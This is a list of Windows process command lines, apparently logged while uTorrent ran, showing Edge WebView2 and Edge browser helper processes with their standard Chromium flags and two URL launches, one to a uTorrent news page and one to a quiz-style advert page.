"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --type=gpu-process --field-trial-handle=1908,16530629815567354284,17614778898650241542,131072 --enable-features=ForwardMemoryPressureEventsToGpuProcess,UseSwapChainsInSoftware --disable-features=FilterAdsOnAbusiveSites,SpareRendererForSitePerProcess,WebPayments,msApplicationGuard,msAutomaticTabFreeze,msBrowserSettingsSupported,msEdgeFaviconService,msEdgeLinkDoctor,msEdgeMGPFrev1,msEdgeOnRampFRE,msEdgeOnRampImport,msEdgeReadingView,msEdgeSettingsImport,msEdgeSettingsImportV2,msEdgeShoppingUI,msEdgeTranslate,msEdgeUseCaptivePortalService,msEnhancedTrackingPreventionEnabled,msImplicitSignin,msPasswordBreachDetection,msReadAloud,msRevokeExtensions,msSendClientDataHeader,msSendClientDataHeaderToEdgeServices,msSyncEdgeCollections,msUseLabelingService,msWebAssistHistorySearch --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView" --webview-exe-name=utorrentie.exe --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=0 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1916 /prefetch:2

C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe

"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1908,16530629815567354284,17614778898650241542,131072 --enable-features=ForwardMemoryPressureEventsToGpuProcess,UseSwapChainsInSoftware --disable-features=FilterAdsOnAbusiveSites,SpareRendererForSitePerProcess,WebPayments,msApplicationGuard,msAutomaticTabFreeze,msBrowserSettingsSupported,msEdgeFaviconService,msEdgeLinkDoctor,msEdgeMGPFrev1,msEdgeOnRampFRE,msEdgeOnRampImport,msEdgeReadingView,msEdgeSettingsImport,msEdgeSettingsImportV2,msEdgeShoppingUI,msEdgeTranslate,msEdgeUseCaptivePortalService,msEnhancedTrackingPreventionEnabled,msImplicitSignin,msPasswordBreachDetection,msReadAloud,msRevokeExtensions,msSendClientDataHeader,msSendClientDataHeaderToEdgeServices,msSyncEdgeCollections,msUseLabelingService,msWebAssistHistorySearch --lang=en-US --service-sandbox-type=none --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView" --webview-exe-name=utorrentie.exe --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=0 --mojo-platform-channel-handle=1968 /prefetch:3

C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe

"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --type=gpu-process --field-trial-handle=1860,12469116650817951988,14240505516930928696,131072 --enable-features=ForwardMemoryPressureEventsToGpuProcess,UseSwapChainsInSoftware --disable-features=FilterAdsOnAbusiveSites,SpareRendererForSitePerProcess,WebPayments,msApplicationGuard,msAutomaticTabFreeze,msBrowserSettingsSupported,msEdgeFaviconService,msEdgeLinkDoctor,msEdgeMGPFrev1,msEdgeOnRampFRE,msEdgeOnRampImport,msEdgeReadingView,msEdgeSettingsImport,msEdgeSettingsImportV2,msEdgeShoppingUI,msEdgeTranslate,msEdgeUseCaptivePortalService,msEnhancedTrackingPreventionEnabled,msImplicitSignin,msPasswordBreachDetection,msReadAloud,msRevokeExtensions,msSendClientDataHeader,msSendClientDataHeaderToEdgeServices,msSyncEdgeCollections,msUseLabelingService,msWebAssistHistorySearch --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView" --webview-exe-name=utorrentie.exe --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=0 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=2000 /prefetch:2

C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe

"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1860,12469116650817951988,14240505516930928696,131072 --enable-features=ForwardMemoryPressureEventsToGpuProcess,UseSwapChainsInSoftware --disable-features=FilterAdsOnAbusiveSites,SpareRendererForSitePerProcess,WebPayments,msApplicationGuard,msAutomaticTabFreeze,msBrowserSettingsSupported,msEdgeFaviconService,msEdgeLinkDoctor,msEdgeMGPFrev1,msEdgeOnRampFRE,msEdgeOnRampImport,msEdgeReadingView,msEdgeSettingsImport,msEdgeSettingsImportV2,msEdgeShoppingUI,msEdgeTranslate,msEdgeUseCaptivePortalService,msEnhancedTrackingPreventionEnabled,msImplicitSignin,msPasswordBreachDetection,msReadAloud,msRevokeExtensions,msSendClientDataHeader,msSendClientDataHeaderToEdgeServices,msSyncEdgeCollections,msUseLabelingService,msWebAssistHistorySearch --lang=en-US --service-sandbox-type=none --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView" --webview-exe-name=utorrentie.exe --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=0 --mojo-platform-channel-handle=2052 /prefetch:3

C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe

"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1860,12469116650817951988,14240505516930928696,131072 --enable-features=ForwardMemoryPressureEventsToGpuProcess,UseSwapChainsInSoftware --disable-features=FilterAdsOnAbusiveSites,SpareRendererForSitePerProcess,WebPayments,msApplicationGuard,msAutomaticTabFreeze,msBrowserSettingsSupported,msEdgeFaviconService,msEdgeLinkDoctor,msEdgeMGPFrev1,msEdgeOnRampFRE,msEdgeOnRampImport,msEdgeReadingView,msEdgeSettingsImport,msEdgeSettingsImportV2,msEdgeShoppingUI,msEdgeTranslate,msEdgeUseCaptivePortalService,msEnhancedTrackingPreventionEnabled,msImplicitSignin,msPasswordBreachDetection,msReadAloud,msRevokeExtensions,msSendClientDataHeader,msSendClientDataHeaderToEdgeServices,msSyncEdgeCollections,msUseLabelingService,msWebAssistHistorySearch --lang=en-US --service-sandbox-type=utility --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView" --webview-exe-name=utorrentie.exe --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=0 --mojo-platform-channel-handle=2496 /prefetch:8

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe

"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --type=renderer --js-flags="--harmony-weak-refs-with-cleanup-some --expose-gc" --field-trial-handle=1860,12469116650817951988,14240505516930928696,131072 --enable-features=ForwardMemoryPressureEventsToGpuProcess,UseSwapChainsInSoftware --disable-features=FilterAdsOnAbusiveSites,SpareRendererForSitePerProcess,WebPayments,msApplicationGuard,msAutomaticTabFreeze,msBrowserSettingsSupported,msEdgeFaviconService,msEdgeLinkDoctor,msEdgeMGPFrev1,msEdgeOnRampFRE,msEdgeOnRampImport,msEdgeReadingView,msEdgeSettingsImport,msEdgeSettingsImportV2,msEdgeShoppingUI,msEdgeTranslate,msEdgeUseCaptivePortalService,msEnhancedTrackingPreventionEnabled,msImplicitSignin,msPasswordBreachDetection,msReadAloud,msRevokeExtensions,msSendClientDataHeader,msSendClientDataHeaderToEdgeServices,msSyncEdgeCollections,msUseLabelingService,msWebAssistHistorySearch --lang=en-US --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView" --webview-exe-name=utorrentie.exe --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=0 --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2992 /prefetch:1

C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe

"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --type=renderer --js-flags="--harmony-weak-refs-with-cleanup-some --expose-gc" --field-trial-handle=1860,12469116650817951988,14240505516930928696,131072 --enable-features=ForwardMemoryPressureEventsToGpuProcess,UseSwapChainsInSoftware --disable-features=FilterAdsOnAbusiveSites,SpareRendererForSitePerProcess,WebPayments,msApplicationGuard,msAutomaticTabFreeze,msBrowserSettingsSupported,msEdgeFaviconService,msEdgeLinkDoctor,msEdgeMGPFrev1,msEdgeOnRampFRE,msEdgeOnRampImport,msEdgeReadingView,msEdgeSettingsImport,msEdgeSettingsImportV2,msEdgeShoppingUI,msEdgeTranslate,msEdgeUseCaptivePortalService,msEnhancedTrackingPreventionEnabled,msImplicitSignin,msPasswordBreachDetection,msReadAloud,msRevokeExtensions,msSendClientDataHeader,msSendClientDataHeaderToEdgeServices,msSyncEdgeCollections,msUseLabelingService,msWebAssistHistorySearch --lang=en-US --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView" --webview-exe-name=utorrentie.exe --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=0 --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3324 /prefetch:1

C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe

"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1736,17033338692039194756,8420424883979609974,131072 --enable-features=ForwardMemoryPressureEventsToGpuProcess,UseSwapChainsInSoftware --disable-features=FilterAdsOnAbusiveSites,SpareRendererForSitePerProcess,WebPayments,msApplicationGuard,msAutomaticTabFreeze,msBrowserSettingsSupported,msEdgeFaviconService,msEdgeLinkDoctor,msEdgeMGPFrev1,msEdgeOnRampFRE,msEdgeOnRampImport,msEdgeReadingView,msEdgeSettingsImport,msEdgeSettingsImportV2,msEdgeShoppingUI,msEdgeTranslate,msEdgeUseCaptivePortalService,msEnhancedTrackingPreventionEnabled,msImplicitSignin,msPasswordBreachDetection,msReadAloud,msRevokeExtensions,msSendClientDataHeader,msSendClientDataHeaderToEdgeServices,msSyncEdgeCollections,msUseLabelingService,msWebAssistHistorySearch --lang=en-US --service-sandbox-type=none --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView" --webview-exe-name=utorrentie.exe --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=0 --mojo-platform-channel-handle=1924 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://utorrent.com/prodnews?v=3%2e6%2e0%2e1%2e47142&pv=0.0.0.0.0

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0x80,0x10c,0x7fffcb093cb8,0x7fffcb093cc8,0x7fffcb093cd8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1860,2911207103318577068,16792507121962570219,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1876 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1860,2911207103318577068,16792507121962570219,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2008 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1860,2911207103318577068,16792507121962570219,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2688 /prefetch:8

C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe

"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --type=renderer --js-flags="--harmony-weak-refs-with-cleanup-some --expose-gc" --field-trial-handle=1860,12469116650817951988,14240505516930928696,131072 --enable-features=ForwardMemoryPressureEventsToGpuProcess,UseSwapChainsInSoftware --disable-features=FilterAdsOnAbusiveSites,SpareRendererForSitePerProcess,WebPayments,msApplicationGuard,msAutomaticTabFreeze,msBrowserSettingsSupported,msEdgeFaviconService,msEdgeLinkDoctor,msEdgeMGPFrev1,msEdgeOnRampFRE,msEdgeOnRampImport,msEdgeReadingView,msEdgeSettingsImport,msEdgeSettingsImportV2,msEdgeShoppingUI,msEdgeTranslate,msEdgeUseCaptivePortalService,msEnhancedTrackingPreventionEnabled,msImplicitSignin,msPasswordBreachDetection,msReadAloud,msRevokeExtensions,msSendClientDataHeader,msSendClientDataHeaderToEdgeServices,msSyncEdgeCollections,msUseLabelingService,msWebAssistHistorySearch --lang=en-US --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView" --webview-exe-name=utorrentie.exe --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=0 --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4056 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1860,2911207103318577068,16792507121962570219,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3220 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1860,2911207103318577068,16792507121962570219,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3228 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1860,2911207103318577068,16792507121962570219,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5024 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1860,2911207103318577068,16792507121962570219,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4656 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1860,2911207103318577068,16792507121962570219,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5308 /prefetch:8

C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe

"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --field-trial-handle=1860,12469116650817951988,14240505516930928696,131072 --enable-features=ForwardMemoryPressureEventsToGpuProcess,UseSwapChainsInSoftware --disable-features=FilterAdsOnAbusiveSites,SpareRendererForSitePerProcess,WebPayments,msApplicationGuard,msAutomaticTabFreeze,msBrowserSettingsSupported,msEdgeFaviconService,msEdgeLinkDoctor,msEdgeMGPFrev1,msEdgeOnRampFRE,msEdgeOnRampImport,msEdgeReadingView,msEdgeSettingsImport,msEdgeSettingsImportV2,msEdgeShoppingUI,msEdgeTranslate,msEdgeUseCaptivePortalService,msEnhancedTrackingPreventionEnabled,msImplicitSignin,msPasswordBreachDetection,msReadAloud,msRevokeExtensions,msSendClientDataHeader,msSendClientDataHeaderToEdgeServices,msSyncEdgeCollections,msUseLabelingService,msWebAssistHistorySearch --lang=en-US --service-sandbox-type=entity_extraction --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView" --webview-exe-name=utorrentie.exe --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=0 --mojo-platform-channel-handle=4980 /prefetch:8

C:\Users\Admin\AppData\Roaming\uTorrent\updates\3.6.0_47142\utorrentie.exe

"C:\Users\Admin\AppData\Roaming\uTorrent\updates\3.6.0_47142\utorrentie.exe" uTorrent_2008_03CB6550_606735135 µTorrent4823DF041B09 uTorrent ce unp

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://play2330.atmequiz.com/start

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7fffcb093cb8,0x7fffcb093cc8,0x7fffcb093cd8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1860,2911207103318577068,16792507121962570219,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5432 /prefetch:1

C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe

"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --embedded-browser-webview=1 --webview-exe-name=utorrentie.exe --user-data-dir="C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView" --no-default-browser-check --disable-component-extensions-with-background-pages --no-first-run --disable-default-apps --noerrdialogs --embedded-browser-webview-dpi-awareness=0 --disable-features=msEnhancedTrackingPreventionEnabled --disable-popup-blocking --internet-explorer-integration=none --js-flags="--harmony-weak-refs-with-cleanup-some --expose-gc" --mojo-named-platform-channel-pipe=4432.4316.7987634700710655576

C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe

"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView\Crashpad --metrics-dir=C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --annotation=plat=Win64 "--annotation=prod=Edge WebView2" --annotation=ver=90.0.818.66 --initial-client-data=0x108,0x10c,0x110,0xe4,0x1b8,0x7fffcb093cb8,0x7fffcb093cc8,0x7fffcb093cd8

C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe

"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --type=gpu-process --field-trial-handle=1828,10188426019090277270,17373410644144937637,131072 --enable-features=ForwardMemoryPressureEventsToGpuProcess,UseSwapChainsInSoftware --disable-features=FilterAdsOnAbusiveSites,SpareRendererForSitePerProcess,WebPayments,msApplicationGuard,msAutomaticTabFreeze,msBrowserSettingsSupported,msEdgeFaviconService,msEdgeLinkDoctor,msEdgeMGPFrev1,msEdgeOnRampFRE,msEdgeOnRampImport,msEdgeReadingView,msEdgeSettingsImport,msEdgeSettingsImportV2,msEdgeShoppingUI,msEdgeTranslate,msEdgeUseCaptivePortalService,msEnhancedTrackingPreventionEnabled,msImplicitSignin,msPasswordBreachDetection,msReadAloud,msRevokeExtensions,msSendClientDataHeader,msSendClientDataHeaderToEdgeServices,msSyncEdgeCollections,msUseLabelingService,msWebAssistHistorySearch --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView" --webview-exe-name=utorrentie.exe --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=0 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1840 /prefetch:2

C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe

"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --type=renderer --js-flags="--harmony-weak-refs-with-cleanup-some --expose-gc" --field-trial-handle=1860,12469116650817951988,14240505516930928696,131072 --enable-features=ForwardMemoryPressureEventsToGpuProcess,UseSwapChainsInSoftware --disable-features=FilterAdsOnAbusiveSites,SpareRendererForSitePerProcess,WebPayments,msApplicationGuard,msAutomaticTabFreeze,msBrowserSettingsSupported,msEdgeFaviconService,msEdgeLinkDoctor,msEdgeMGPFrev1,msEdgeOnRampFRE,msEdgeOnRampImport,msEdgeReadingView,msEdgeSettingsImport,msEdgeSettingsImportV2,msEdgeShoppingUI,msEdgeTranslate,msEdgeUseCaptivePortalService,msEnhancedTrackingPreventionEnabled,msImplicitSignin,msPasswordBreachDetection,msReadAloud,msRevokeExtensions,msSendClientDataHeader,msSendClientDataHeaderToEdgeServices,msSyncEdgeCollections,msUseLabelingService,msWebAssistHistorySearch --lang=en-US --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView" --webview-exe-name=utorrentie.exe --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=0 --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4272 /prefetch:1

C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe

"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1828,10188426019090277270,17373410644144937637,131072 --enable-features=ForwardMemoryPressureEventsToGpuProcess,UseSwapChainsInSoftware --disable-features=FilterAdsOnAbusiveSites,SpareRendererForSitePerProcess,WebPayments,msApplicationGuard,msAutomaticTabFreeze,msBrowserSettingsSupported,msEdgeFaviconService,msEdgeLinkDoctor,msEdgeMGPFrev1,msEdgeOnRampFRE,msEdgeOnRampImport,msEdgeReadingView,msEdgeSettingsImport,msEdgeSettingsImportV2,msEdgeShoppingUI,msEdgeTranslate,msEdgeUseCaptivePortalService,msEnhancedTrackingPreventionEnabled,msImplicitSignin,msPasswordBreachDetection,msReadAloud,msRevokeExtensions,msSendClientDataHeader,msSendClientDataHeaderToEdgeServices,msSyncEdgeCollections,msUseLabelingService,msWebAssistHistorySearch --lang=en-US --service-sandbox-type=none --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView" --webview-exe-name=utorrentie.exe --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=0 --mojo-platform-channel-handle=2188 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1860,2911207103318577068,16792507121962570219,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5440 /prefetch:1

C:\Users\Admin\AppData\Roaming\uTorrent\updates\3.6.0_47142\utorrentie.exe

"C:\Users\Admin\AppData\Roaming\uTorrent\updates\3.6.0_47142\utorrentie.exe" uTorrent_2008_03CB5BB0_1201853113 µTorrent4823DF041B09 uTorrent ce unp

C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe

"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1860,12469116650817951988,14240505516930928696,131072 --enable-features=ForwardMemoryPressureEventsToGpuProcess,UseSwapChainsInSoftware --disable-features=FilterAdsOnAbusiveSites,SpareRendererForSitePerProcess,WebPayments,msApplicationGuard,msAutomaticTabFreeze,msBrowserSettingsSupported,msEdgeFaviconService,msEdgeLinkDoctor,msEdgeMGPFrev1,msEdgeOnRampFRE,msEdgeOnRampImport,msEdgeReadingView,msEdgeSettingsImport,msEdgeSettingsImportV2,msEdgeShoppingUI,msEdgeTranslate,msEdgeUseCaptivePortalService,msEnhancedTrackingPreventionEnabled,msImplicitSignin,msPasswordBreachDetection,msReadAloud,msRevokeExtensions,msSendClientDataHeader,msSendClientDataHeaderToEdgeServices,msSyncEdgeCollections,msUseLabelingService,msWebAssistHistorySearch --lang=en-US --service-sandbox-type=none --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView" --webview-exe-name=utorrentie.exe --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=0 --mojo-platform-channel-handle=5588 /prefetch:8

C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe

